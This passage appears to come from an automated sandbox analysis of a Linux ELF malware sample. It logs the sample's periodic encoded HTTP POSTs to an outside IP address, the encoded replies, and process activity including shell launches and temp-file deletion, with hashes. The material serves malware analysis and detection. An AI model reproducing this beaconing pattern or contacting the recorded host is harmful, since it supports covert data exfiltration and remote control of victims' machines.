                                                                          Data Raw: 5a 6a 45 77 4e 47 49 33 59 6d 59 74 59 7a 63 33 59 79 30 30 4e 32 4d 78 4c 57 45 34 5a 57 59 74 4f 54 41 33 4d 54 4a 6c 4d 32 59 30 4e 44 67 32 76 69 6a 78 4e 50 79 43 6a 45 52 2f 71 62 50 2b 7a 55 37 61 50 37 6c 73 63 42 32 70 31 73 4e 50 68 48 67 73 31 45 75 31 74 73 55 6d 47 63 57 59 34 35 30 4b 55 65 45 74 36 51 2f 6e 6f 36 50 77 71 76 2f 68 34 76 53 58 66 37 6a 56 73 70 4b 37 77 39 57 4a 36 4a 71 4d 6f 37 37 69 71 67 54 74 6f 6e 54 58 59 63 32 64 46 67 55 51 6b 63 4a 53 34 4f 73 6c 4a 61 56 62 6e 4a 4d 74 55 64 45 66 62 31 35 42 4e 61 64 4e 6f 35 31 38 6b 70 56 41 4d 44 72 46 57 77 47 54 32 58 79 68 33 5a 49 47 70 4e 51 4c 47 43 67 34 51 4b 52 47 59 58 37 70 50 67 35 49 49 6f 45 4b 71 67 6b 51 2f 66 6d 4a
                                                                          Data Ascii: ZjEwNGI3YmYtYzc3Yy00N2MxLWE4ZWYtOTA3MTJlM2Y0NDg2vijxNPyCjER/qbP+zU7aP7lscB2p1sNPhHgs1Eu1tsUmGcWY450KUeEt6Q/no6Pwqv/h4vSXf7jVspK7w9WJ6JqMo77iqgTtonTXYc2dFgUQkcJS4OslJaVbnJMtUdEfb15BNadNo518kpVAMDrFWwGT2Xyh3ZIGpNQLGCg4QKRGYX7pPg5IIoEKqgkQ/fmJ


                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                          2192.168.2.2359570164.92.211.17680
                                                                          TimestampBytes transferredDirectionData
                                                                          Mar 18, 2025 09:04:50.979954004 CET415OUTPOST /data HTTP/1.1
                                                                          Host: 164.92.211.176
                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                                                          Content-Length: 220
                                                                          Accept-Encoding: gzip
                                                                          Connection: close
                                                                          Data Raw: 59 7a 41 79 4d 6d 5a 6d 4e 6d 49 74 4e 7a 46 69 4e 43 30 30 4f 54 45 30 4c 54 67 30 59 57 59 74 5a 44 51 35 5a 6d 4a 6a 59 6a 46 6a 59 7a 41 78 39 73 2b 6e 62 5a 44 73 67 45 71 58 70 7a 6c 69 45 37 42 59 67 51 44 52 38 2b 67 37 79 4a 4d 34 76 69 70 6e 7a 30 4a 74 57 57 79 6f 79 45 2b 37 36 64 57 42 79 36 57 38 49 4e 52 34 69 46 37 30 64 61 51 2b 79 4f 6d 54 6b 74 52 77 53 77 6a 42 58 69 6b 55 68 76 4a 47 73 4f 36 72 50 76 6f 78 54 69 59 76 6e 45 77 54 63 44 78 38 51 31 31 43 66 69 31 49 66 42 72 7a 59 4e 69 6e 73 58 70 35 62 65 42 54 63 77 4c 50 4e 6d 79 79 33 55 59 49 62 68 46 64 42 30 55 42 38 47 63 57 57 6a 73 7a 2b 53 46 73 75 37 30 69 58 78 4d 3d
                                                                          Data Ascii: YzAyMmZmNmItNzFiNC00OTE0LTg0YWYtZDQ5ZmJjYjFjYzAx9s+nbZDsgEqXpzliE7BYgQDR8+g7yJM4vipnz0JtWWyoyE+76dWBy6W8INR4iF70daQ+yOmTktRwSwjBXikUhvJGsO6rPvoxTiYvnEwTcDx8Q11Cfi1IfBrzYNinsXp5beBTcwLPNmyy3UYIbhFdB0UB8GcWWjsz+SFsu70iXxM=
                                                                          Mar 18, 2025 09:04:51.580171108 CET457INHTTP/1.1 200 OK
                                                                          Cache-Control: max-age=0, no-cache
                                                                          Content-Length: 176
                                                                          Content-Type: application/javascript; charset=utf-8
                                                                          Content-Type: application/octet-stream
                                                                          Date: Tue, 18 Mar 2025 08:04:51 GMT
                                                                          Pragma: no-cache
                                                                          Server: NetDNA-cache/2.2
                                                                          Connection: close
                                                                          Data Raw: 59 7a 41 79 4d 6d 5a 6d 4e 6d 49 74 4e 7a 46 69 4e 43 30 30 4f 54 45 30 4c 54 67 30 59 57 59 74 5a 44 51 35 5a 6d 4a 6a 59 6a 46 6a 59 7a 41 78 36 34 70 6a 49 31 75 52 42 6c 41 42 78 64 39 41 79 50 63 68 57 70 41 4f 6d 6c 2f 4a 6f 6c 73 74 39 49 37 79 77 73 31 67 43 61 65 36 6d 6a 47 68 43 2b 37 72 36 54 37 42 35 53 70 46 71 62 6a 63 37 59 78 7a 59 4d 73 46 2b 75 77 39 6a 36 65 43 4f 47 4c 61 2f 46 34 4c 37 70 68 42 6d 49 38 4e 33 59 33 49 78 66 2b 6d 70 31 79 6f 6f 48 4a 54 61 67 55 32 46 2f 58 68 6a 37 61 47 34 35 76 6a
                                                                          Data Ascii: YzAyMmZmNmItNzFiNC00OTE0LTg0YWYtZDQ5ZmJjYjFjYzAx64pjI1uRBlABxd9AyPchWpAOml/Jolst9I7yws1gCae6mjGhC+7r6T7B5SpFqbjc7YxzYMsF+uw9j6eCOGLa/F4L7phBmI8N3Y3Ixf+mp1yooHJTagU2F/Xhj7aG45vj


                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                          3192.168.2.2359572164.92.211.17680
                                                                          TimestampBytes transferredDirectionData
                                                                          Mar 18, 2025 09:05:01.595354080 CET415OUTPOST /data HTTP/1.1
                                                                          Host: 164.92.211.176
                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                                                          Content-Length: 220
                                                                          Accept-Encoding: gzip
                                                                          Connection: close
                                                                          Data Raw: 59 7a 41 79 4d 6d 5a 6d 4e 6d 49 74 4e 7a 46 69 4e 43 30 30 4f 54 45 30 4c 54 67 30 59 57 59 74 5a 44 51 35 5a 6d 4a 6a 59 6a 46 6a 59 7a 41 78 58 49 6b 63 48 5a 6c 57 45 4f 74 4a 75 5a 7a 77 6f 6e 6c 37 47 34 38 78 37 35 4d 66 63 51 38 45 6b 74 63 61 6b 62 44 75 75 71 31 64 59 59 6c 4a 2f 66 54 6c 50 4e 43 57 71 49 38 75 71 69 77 2f 51 66 5a 39 68 30 6d 58 34 4d 76 59 61 35 37 41 35 59 72 42 67 55 57 63 7a 79 2b 64 48 5a 61 70 37 71 61 31 69 2b 4a 6a 71 54 30 49 6e 69 72 65 52 70 42 34 58 72 70 58 71 52 46 31 4c 74 70 6b 4f 34 45 64 56 4a 69 4c 6c 75 51 2b 4a 57 31 4e 61 6f 58 64 54 44 54 4b 62 47 78 76 72 78 65 6a 6e 31 48 62 54 48 55 72 2f 43 49 3d
                                                                          Data Ascii: YzAyMmZmNmItNzFiNC00OTE0LTg0YWYtZDQ5ZmJjYjFjYzAxXIkcHZlWEOtJuZzwonl7G48x75MfcQ8EktcakbDuuq1dYYlJ/fTlPNCWqI8uqiw/QfZ9h0mX4MvYa57A5YrBgUWczy+dHZap7qa1i+JjqT0InireRpB4XrpXqRF1LtpkO4EdVJiLluQ+JW1NaoXdTDTKbGxvrxejn1HbTHUr/CI=
                                                                          Mar 18, 2025 09:05:02.213525057 CET457INHTTP/1.1 200 OK
                                                                          Cache-Control: max-age=0, no-cache
                                                                          Content-Length: 176
                                                                          Content-Type: application/javascript; charset=utf-8
                                                                          Content-Type: application/octet-stream
                                                                          Date: Tue, 18 Mar 2025 08:05:02 GMT
                                                                          Pragma: no-cache
                                                                          Server: NetDNA-cache/2.2
                                                                          Connection: close
                                                                          Data Raw: 59 7a 41 79 4d 6d 5a 6d 4e 6d 49 74 4e 7a 46 69 4e 43 30 30 4f 54 45 30 4c 54 67 30 59 57 59 74 5a 44 51 35 5a 6d 4a 6a 59 6a 46 6a 59 7a 41 78 78 53 6c 64 46 36 41 31 38 63 65 43 52 59 75 6a 44 4c 2f 6b 57 57 36 54 6d 4d 31 65 4f 61 43 2f 58 50 2b 4b 4f 76 2f 32 35 46 68 37 44 45 70 6c 35 2b 4b 31 42 4d 42 2b 78 2f 6a 72 4a 4a 47 33 38 42 59 65 76 61 47 67 7a 4f 65 65 4e 7a 2b 7a 6f 31 47 4c 62 78 4f 58 62 33 58 76 6b 53 34 74 47 4e 51 65 65 73 37 2b 32 64 36 62 75 50 50 5a 66 4a 44 70 2f 72 4b 43 59 6b 35 6e 79 55 31 49
                                                                          Data Ascii: YzAyMmZmNmItNzFiNC00OTE0LTg0YWYtZDQ5ZmJjYjFjYzAxxSldF6A18ceCRYujDL/kWW6TmM1eOaC/XP+KOv/25Fh7DEpl5+K1BMB+x/jrJJG38BYevaGgzOeeNz+zo1GLbxOXb3XvkS4tGNQees7+2d6buPPZfJDp/rKCYk5nyU1I


                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                          4192.168.2.2359574164.92.211.17680
                                                                          TimestampBytes transferredDirectionData
                                                                          Mar 18, 2025 09:05:12.223552942 CET415OUTPOST /data HTTP/1.1
                                                                          Host: 164.92.211.176
                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                                                          Content-Length: 220
                                                                          Accept-Encoding: gzip
                                                                          Connection: close
                                                                          Data Raw: 59 7a 41 79 4d 6d 5a 6d 4e 6d 49 74 4e 7a 46 69 4e 43 30 30 4f 54 45 30 4c 54 67 30 59 57 59 74 5a 44 51 35 5a 6d 4a 6a 59 6a 46 6a 59 7a 41 78 4c 70 4d 51 53 52 6c 76 51 6f 69 50 4a 6f 43 4b 2b 36 67 69 72 42 7a 64 6c 46 33 72 73 6c 71 34 43 33 74 41 59 4c 61 65 76 53 4f 33 49 4d 30 51 42 2b 74 52 4f 74 43 6f 4c 39 2b 30 45 75 4f 6a 4a 77 70 6a 42 68 66 79 41 65 71 6e 49 58 2f 74 66 36 6c 6a 78 33 41 7a 4a 76 41 6a 38 66 74 63 6f 7a 39 53 4e 31 78 37 46 48 49 71 43 72 38 73 2f 32 68 44 41 62 63 52 4f 43 2f 4f 64 67 65 5a 74 72 76 56 36 71 66 70 6a 76 37 44 6f 33 72 4c 4a 38 67 52 56 57 6b 30 72 6d 46 53 7a 72 42 69 46 67 63 47 62 33 63 2b 64 32 67 3d
                                                                          Data Ascii: YzAyMmZmNmItNzFiNC00OTE0LTg0YWYtZDQ5ZmJjYjFjYzAxLpMQSRlvQoiPJoCK+6girBzdlF3rslq4C3tAYLaevSO3IM0QB+tROtCoL9+0EuOjJwpjBhfyAeqnIX/tf6ljx3AzJvAj8ftcoz9SN1x7FHIqCr8s/2hDAbcROC/OdgeZtrvV6qfpjv7Do3rLJ8gRVWk0rmFSzrBiFgcGb3c+d2g=
                                                                          Mar 18, 2025 09:05:12.828819036 CET457INHTTP/1.1 200 OK
                                                                          Cache-Control: max-age=0, no-cache
                                                                          Content-Length: 176
                                                                          Content-Type: application/javascript; charset=utf-8
                                                                          Content-Type: application/octet-stream
                                                                          Date: Tue, 18 Mar 2025 08:05:12 GMT
                                                                          Pragma: no-cache
                                                                          Server: NetDNA-cache/2.2
                                                                          Connection: close
                                                                          Data Raw: 59 7a 41 79 4d 6d 5a 6d 4e 6d 49 74 4e 7a 46 69 4e 43 30 30 4f 54 45 30 4c 54 67 30 59 57 59 74 5a 44 51 35 5a 6d 4a 6a 59 6a 46 6a 59 7a 41 78 65 7a 33 41 56 63 59 79 4c 66 69 4f 4a 6b 51 33 37 6d 63 44 48 75 35 71 49 74 4e 7a 72 71 4f 73 7a 57 49 47 36 66 41 34 51 68 45 4f 68 2b 48 2b 79 2f 49 6b 6f 67 73 68 65 51 32 55 56 6b 79 62 2f 71 76 58 68 6f 6b 6c 4a 39 53 6f 6f 79 32 7a 77 49 77 36 6c 6e 44 5a 4b 32 31 46 58 4f 53 77 6f 72 79 54 71 32 62 38 5a 6b 4d 74 4d 2b 62 5a 48 6a 58 74 49 50 58 2f 57 66 6e 69 71 6d 66 48
                                                                          Data Ascii: YzAyMmZmNmItNzFiNC00OTE0LTg0YWYtZDQ5ZmJjYjFjYzAxez3AVcYyLfiOJkQ37mcDHu5qItNzrqOszWIG6fA4QhEOh+H+y/IkogsheQ2UVkyb/qvXhoklJ9Sooy2zwIw6lnDZK21FXOSworyTq2b8ZkMtM+bZHjXtIPX/WfniqmfH


                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                          5192.168.2.2359576164.92.211.17680
                                                                          TimestampBytes transferredDirectionData
                                                                          Mar 18, 2025 09:05:22.837496996 CET415OUTPOST /data HTTP/1.1
                                                                          Host: 164.92.211.176
                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                                                          Content-Length: 220
                                                                          Accept-Encoding: gzip
                                                                          Connection: close
                                                                          Data Raw: 59 7a 41 79 4d 6d 5a 6d 4e 6d 49 74 4e 7a 46 69 4e 43 30 30 4f 54 45 30 4c 54 67 30 59 57 59 74 5a 44 51 35 5a 6d 4a 6a 59 6a 46 6a 59 7a 41 78 67 65 78 59 65 51 73 30 69 63 4c 4a 6f 30 4a 55 52 65 41 63 63 59 65 61 33 41 4c 54 67 72 37 6c 46 38 56 69 74 4b 62 45 37 4a 73 75 70 75 30 33 45 44 70 4e 4e 50 45 31 6c 6b 4d 46 75 4d 50 68 6d 6b 39 33 32 67 71 47 68 46 55 71 6f 72 65 43 4a 52 59 54 5a 6d 72 54 63 42 74 47 48 66 33 47 79 64 33 54 41 74 36 67 30 50 66 31 6d 38 72 63 68 35 61 63 2f 55 33 6e 72 35 73 2f 37 4e 59 51 64 73 34 55 54 37 38 4b 30 6b 78 31 49 45 4a 39 6f 6a 41 75 78 49 78 74 76 70 66 63 54 5a 61 4f 74 6b 77 41 4d 6f 44 49 4c 68 4d 3d
                                                                          Data Ascii: YzAyMmZmNmItNzFiNC00OTE0LTg0YWYtZDQ5ZmJjYjFjYzAxgexYeQs0icLJo0JUReAccYea3ALTgr7lF8VitKbE7Jsupu03EDpNNPE1lkMFuMPhmk932gqGhFUqoreCJRYTZmrTcBtGHf3Gyd3TAt6g0Pf1m8rch5ac/U3nr5s/7NYQds4UT78K0kx1IEJ9ojAuxIxtvpfcTZaOtkwAMoDILhM=
                                                                          Mar 18, 2025 09:05:23.459464073 CET457INHTTP/1.1 200 OK
                                                                          Cache-Control: max-age=0, no-cache
                                                                          Content-Length: 176
                                                                          Content-Type: application/javascript; charset=utf-8
                                                                          Content-Type: application/octet-stream
                                                                          Date: Tue, 18 Mar 2025 08:05:23 GMT
                                                                          Pragma: no-cache
                                                                          Server: NetDNA-cache/2.2
                                                                          Connection: close
                                                                          Data Raw: 59 7a 41 79 4d 6d 5a 6d 4e 6d 49 74 4e 7a 46 69 4e 43 30 30 4f 54 45 30 4c 54 67 30 59 57 59 74 5a 44 51 35 5a 6d 4a 6a 59 6a 46 6a 59 7a 41 78 54 39 45 55 32 6b 79 71 34 33 66 6b 77 46 38 4b 71 69 2b 37 4e 65 68 46 49 74 68 31 43 55 48 2b 49 55 72 70 59 34 4d 64 36 55 43 65 31 6a 4f 33 52 72 48 75 6e 41 6b 56 73 43 5a 71 36 30 47 38 55 51 67 71 4a 35 34 44 63 6f 44 4b 4b 6d 61 55 2f 63 6e 51 46 78 57 33 59 51 74 6b 56 59 71 37 57 2b 6e 4c 6d 57 36 75 56 63 75 75 6e 59 43 4f 7a 64 31 6a 36 4f 6c 6b 33 51 74 4c 68 78 59 2f
                                                                          Data Ascii: YzAyMmZmNmItNzFiNC00OTE0LTg0YWYtZDQ5ZmJjYjFjYzAxT9EU2kyq43fkwF8Kqi+7NehFIth1CUH+IUrpY4Md6UCe1jO3RrHunAkVsCZq60G8UQgqJ54DcoDKKmaU/cnQFxW3YQtkVYq7W+nLmW6uVcuunYCOzd1j6Olk3QtLhxY/


                                                                          System Behavior

                                                                          Start time (UTC):08:04:47
                                                                          Start date (UTC):18/03/2025
                                                                          Path:/tmp/GwRba1mTFR.elf
                                                                          Arguments:/tmp/GwRba1mTFR.elf
                                                                          File size:13570600 bytes
                                                                          MD5 hash:1657c9d6256ef45abfd7476e6aafe66a

                                                                          Start time (UTC):08:04:47
                                                                          Start date (UTC):18/03/2025
                                                                          Path:/usr/bin/dash
                                                                          Arguments:-
                                                                          File size:129816 bytes
                                                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                          Start time (UTC):08:04:47
                                                                          Start date (UTC):18/03/2025
                                                                          Path:/usr/bin/rm
                                                                          Arguments:rm -f /tmp/tmp.1qaSItAQe7 /tmp/tmp.atYAdAIE7L /tmp/tmp.kkt2HvHn2F
                                                                          File size:72056 bytes
                                                                          MD5 hash:aa2b5496fdbfd88e38791ab81f90b95b

                                                                          Start time (UTC):08:04:47
                                                                          Start date (UTC):18/03/2025
                                                                          Path:/usr/bin/dash
                                                                          Arguments:-
                                                                          File size:129816 bytes
                                                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                          Start time (UTC):08:04:47
                                                                          Start date (UTC):18/03/2025
                                                                          Path:/usr/bin/rm
                                                                          Arguments:rm -f /tmp/tmp.1qaSItAQe7 /tmp/tmp.atYAdAIE7L /tmp/tmp.kkt2HvHn2F
                                                                          File size:72056 bytes
                                                                          MD5 hash:aa2b5496fdbfd88e38791ab81f90b95b